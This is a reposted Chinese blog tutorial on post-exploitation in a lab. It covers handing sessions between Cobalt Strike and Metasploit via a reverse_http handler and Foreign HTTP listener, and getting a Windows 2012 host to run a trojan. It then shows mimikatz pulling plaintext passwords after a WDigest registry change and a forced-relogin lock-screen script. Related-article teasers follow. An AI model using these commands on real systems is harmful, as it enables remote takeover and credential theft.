cs与msf权限传递,以及mimikatz抓取win2012明文密码

news2024/12/26 22:42:14

目录

解释参数

foreign http

foreign https

cs与msf权限传递

Cobalt Strike会话传递到Metasploit Framework

Cobalt strike上的操作

​编辑​编辑​编辑

Metasploit Framework上的操作

传递会话

Metasploit Framework会话传递到Cobalt Strike

Cobalt strike上的操作

Metasploit Framework上的操作

传递会话

mimikatz获取win2012 明文密码

Cobalt strike上的操作

Metasploit Framework上的操作

解释参数

foreign http

将目标权限通过http的方式外派给metasploit或empire

通俗易懂 就是用来cs 传递shell 的(http)

foreign https

将目标权限通过https的方式外派给metasploit或empire

通俗易懂 就是用来cs 传递shell 的(https)

cs与msf权限传递

Cobalt Strike会话传递到Metasploit Framework

Cobalt strike上的操作

1、进入cs界面,首先来到 Cobalt Strike 目录下,启动 Cobalt Strike 服务端(我的cs在这个目录下)

2、用客户端进

3、建立监听

4、生成脚本文件

5、开启服务,让win_2012 下载木马文件并运行

6、显示已经获取到了win的权限

Metasploit Framework上的操作

8、进去msf msfconsole

9、在 Metasploit Framework 上调用 handler 模块

use explpit/multi/handler

10、监听

set payload windows/meterpreter/reverse_http
set lhost 192.168.111.141 
set lport 4444
run

传递会话

11、在 Cobalt strike上先创建一个 Foreign HTTP 监听(注意必须得跟msf设置的端口一致)

11、之后在 Cobalt strike 上右击待传递的会话选择 Spawn ,选择刚刚创建的 Foreign HTTP 监听

12、传参完毕

Metasploit Framework会话传递到Cobalt Strike

Cobalt strike上的操作

1、这里选择的是 HTTPS Beacon,添加上主机IP,点击保存,即可创建一个 HTTPS Beacon

Metasploit Framework上的操作

(mimikatz 抓明文密码 1,2 步以详细说明)

传递会话

1、退回 handler 目录下(background)

2、进入inject 敲以下命令(session 1 必须跟 background 之后那个session 得保持一致)

3、查看cs的权限(已经传递)

mimikatz获取win2012 明文密码

Cobalt strike上的操作

1、先抓一次密码(发现是密码是null)

2、可以通过修改注册表来让Wdigest Auth保存明文口令:reg add "HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f

3、修改注册表之后,需要用户重新登录才可以生效(把如下代码保存为lock-screen.ps1)

Function Lock-WorkStation {

$signature = @"

[DllImport("user32.dll", SetLastError = true)]

public static extern bool LockWorkStation();

"@

$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru

$LockWorkStation::LockWorkStation() | Out-Null

}

Lock-WorkStation

4、用win 下载 生成的文件(并运行)

5、重新输入密码就可以获取明文密码

Metasploit Framework上的操作

1、生成木马文件(我之前生成过)


2、用msf监听

3、获取明文密码 

kail 开启下载

win 下载(四个全下载,运行程序)

返回kail端(execute -i -f mimikatz.exe 进入mimikatz)

查看权限(必须为system才可以查到)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1695671.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Tina-Linux -- 3. LVGL测试

Tina-Linux -- 3. LVGL测试

参考韦东山 – Tina_Linux_图形系统_开发指南 Tina-linux lvgl 配置 环境配置 进入Tina-SDK根目录 source build/envsetup.sh lunch XXX平台名称 make menuconfigLVGL Gui --->Littlevgl --->< > lv_demo<*> lv_examples &#xff08;lvgl官方demo&#…
阅读更多...
监控监测管理系统产品规格说明书(实际原件参考)

监控监测管理系统产品规格说明书(实际原件参考)

【智慧工地】监控监测管理系统产品规格说明书编制模板 一、引言 二、 项目概述 三、 总体需求 四、 功能需求 4.1 概述 4.2 业务功能概要描述 4.3 功能性需求 4.4 功能描述 五、 非功能性需求 5.1 用户界面需求 5.2 软硬件环境需求 5.3 产品质量需求 5.4 接口需求 5.5 其他需求…
阅读更多...
HarmonyOS 鸿蒙应用开发 - 多态样式 stateStyles

HarmonyOS 鸿蒙应用开发 - 多态样式 stateStyles

前言&#xff1a;Styles和Extend仅仅应用于静态页面的样式复用&#xff0c;stateStyles可以依据组件的内部状态的不同&#xff0c;快速设置不同样式&#xff0c;类似于css伪类&#xff0c;但语法不同。 ArkUI提供以下四种状态&#xff1a; focused&#xff1a;获焦态。normal&…
阅读更多...
MySQL库/表/数据的操作

MySQL库/表/数据的操作

文章目录 1.数据库操作1.1 创建、删除、查看和修改1.2 编码格式1.3 备份和恢复 2.表的操作2.1 创建表2.2 存储引擎2.3 查看表、修改表、删除表 3.数据类型3.1整数类型3.2字节类型(bit)3.3浮点类型(bit)3.4 decimal3.5 字符串类型3.6 日期和时间类型3.7 enum和set关于如何查找想…
阅读更多...
ES 查询踩坑-全字段匹配

ES 查询踩坑-全字段匹配

需求&#xff1a;name字段需要全匹配查询 name的映射 普通的must查询 GET power_engin/_search {"from": 0,"size": 10,"query": {"bool": {"must": [{"term": {"name": {"value": "尼…
阅读更多...
解决Flutter位于悬浮窗口时,应用Logo不更新问题

解决Flutter位于悬浮窗口时,应用Logo不更新问题

问题描述 我已经更换了应用Logo&#xff0c;但是发现应用处于悬浮窗口时&#xff0c;logo还是更改之前的&#xff1f;下面的图片只是示意。 解决方案 终端命令 rm -rf ~/Library/Developer/Xcode/DerivedData2.xcode视图内解决 先在顶部找到 Xcode --> Setting --> Lo…
阅读更多...
光速入门python的OpenCV

光速入门python的OpenCV

前言 欢迎来到我的博客 个人主页:北岭敲键盘的荒漠猫-CSDN博客 本文整理python的OpenCV模块的关键知识点 争取用最短的时间入门OpenCV 并且做到笔记功能直接复制使用 OpenCV简介 不浪费时间的介绍: 就是类似于ps操作图片。 至于为什么不直接用ps&#xff0c;因为只有程序能…
阅读更多...
AI菜鸟向前飞 — LangChain系列之十四 - Agent系列:从现象看机制(上篇)

AI菜鸟向前飞 — LangChain系列之十四 - Agent系列:从现象看机制(上篇)

上一篇介绍了Agent与LangGraph的基础技能Tool的必知必会 AI菜鸟向前飞 — LangChain系列之十三 - 关于Tool的必知必会 前面已经详细介绍了Promp、RAG&#xff0c;终于来到Agent系列&#xff08;别急后面还有LangGraph&#xff09;&#xff0c;大家可以先看下这张图&#xff1…
阅读更多...
Centos修改系統語言

Centos修改系統語言

一、使用命令行修系统语言 1、显示系统当前语言环 [rootkvm-suma ~]# localectl System Locale: LANGen_US.utf8 VC Keymap: cn X11 Layout: cn 2、查看系统支持字符集 [rootkvm-suma ~]# locale -a 2、设置系统语言环境 [rootkvm-suma ~]# localectl set-locale LANGz…
阅读更多...
2024年汉字小达人活动4个多月开赛:18道历年选择题和答案、解析

2024年汉字小达人活动4个多月开赛:18道历年选择题和答案、解析

根据近年的安排&#xff0c;2024年第11届汉字小达人比赛还有4个多月就启动&#xff0c;那么孩子们如何利用这段时间有条不紊地备考呢&#xff1f;我的建议是两手准备&#xff1a;①把小学1-5年级的语文课本上的知识点熟悉&#xff0c;重点是字、词、成语、古诗。②把历年真题刷…
阅读更多...
Three.js 研究:2、如何让动画线性运动

Three.js 研究:2、如何让动画线性运动

1、默认的动画含有加速度并非线性的 制作好的动画很明显是非线性的&#xff0c;这是一个运动环&#xff0c;为了让环运行线性进行如下设置。 2、设置动画成为线性动画
阅读更多...
移动端开发 笔记01

移动端开发 笔记01

目录 01 移动端的概述 02 移动端的视口标签 03 开发中的二倍图 04 流式布局 05 弹性盒子布局 01 移动端的概述 移动端包括:手机 平板 便携式设备 目前主流的移动端开发: 安卓设备 IOS设备 只要移动端支持浏览器 那么就可以使用浏览器开发移动端项目 开发移动端 使用…
阅读更多...
如何修复 System has not been booted with systemd 报错信息?

如何修复 System has not been booted with systemd 报错信息?

如何修复 System has not been booted with systemd 报错信息&#xff1f; 一、问题描述&#xff1a; 我们在学习 linux 系统时&#xff0c;使用 systemd 命令&#xff08;比如 sudo systemctl status ssh&#xff09;&#xff0c;可能会遇到一个报错信息&#xff1a; System…
阅读更多...
HCIP-Datacom-ARST自选题库__ISIS简答【3道题】

HCIP-Datacom-ARST自选题库__ISIS简答【3道题】

1.IS-1S是链路状态路由协议&#xff0c;便用SPF算法进行路由计算。某园区同时部署了IPv4和IPV6井运行IS-IS实现网络的互联互通&#xff0c;如图所示&#xff0c;该网络IPv4和IPV6开销相同&#xff0c;R1和R4只支持IPV4。缺省情况下&#xff0c;计算形成的IPv6最短路径树中&…
阅读更多...
Redis内存回收-内存淘汰策略

Redis内存回收-内存淘汰策略

LFU的访问次数之所以叫做逻辑访问次数&#xff0c;是因为并不是每次key被访问都计数&#xff0c;而是通过运算&#xff1a; 生成0~1之间的随机数R计算 (旧次数 * lfu_log_factor 1)&#xff0c;记录为P如果 R < P &#xff0c;则计数器 1&#xff0c;且最大不超过255访问…
阅读更多...
深度学习设计模式之桥接模式

深度学习设计模式之桥接模式

文章目录 前言一、介绍二、详细分析1.核心组成2.实现步骤3.代码示例4.优缺点优点缺点 5.使用场景 总结 前言 桥接模式是将抽象部分与实现部分分离&#xff0c;使它们都可以独立的变化。 一、介绍 桥接模式是结构型设计模式&#xff0c;主要是将抽象部分与实现部分分离&#x…
阅读更多...
老显示器该换了,否则会摧毁你的眼睛~

老显示器该换了,否则会摧毁你的眼睛~

正文 大家好&#xff0c;我是bug菌~ 今天给大家带来一篇关于程序员护眼的文章&#xff0c;大部分伙计都是敲代码的&#xff0c;即使不是码农&#xff0c;也多半每天要抱着电脑处理各种事务&#xff0c;那么对眼睛来说还是挺大负担的 特别眼睛原本就不好的朋友更加不友好&#x…
阅读更多...
[MRCTF2020]Xor

[MRCTF2020]Xor

32位程序 主要逻辑 flagMSAWB~FXZ:J:tQJ"N bpdd}8g for i in range(len(flag)):print(chr(ord(flag[i])^i),end)
阅读更多...
得帆信息PMO总监李健达受邀为第十三届中国PMO大会演讲嘉宾

得帆信息PMO总监李健达受邀为第十三届中国PMO大会演讲嘉宾

全国PMO专业人士年度盛会 上海得帆信息技术有限公司aPaaS业务线副总裁、PMO总监李健达先生受邀为PMO评论主办的2024第十三届中国PMO大会演讲嘉宾&#xff0c;演讲议题为“AI时代的PMO工作法”。大会将于6月29-30日在北京举办&#xff0c;敬请关注&#xff01; 议题简要&#x…
阅读更多...
如何在群晖NAS安装WPS Office并使用公网地址远程访问处理文档表格

如何在群晖NAS安装WPS Office并使用公网地址远程访问处理文档表格

前言 作者简介&#xff1a; 懒大王敲代码&#xff0c;计算机专业应届生 今天给大家聊聊如何在群晖NAS安装WPS Office并使用公网地址远程访问处理文档表格&#xff0c;希望大家能觉得实用&#xff01; 欢迎大家点赞 &#x1f44d; 收藏 ⭐ 加关注哦&#xff01;&#x1f496;&a…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023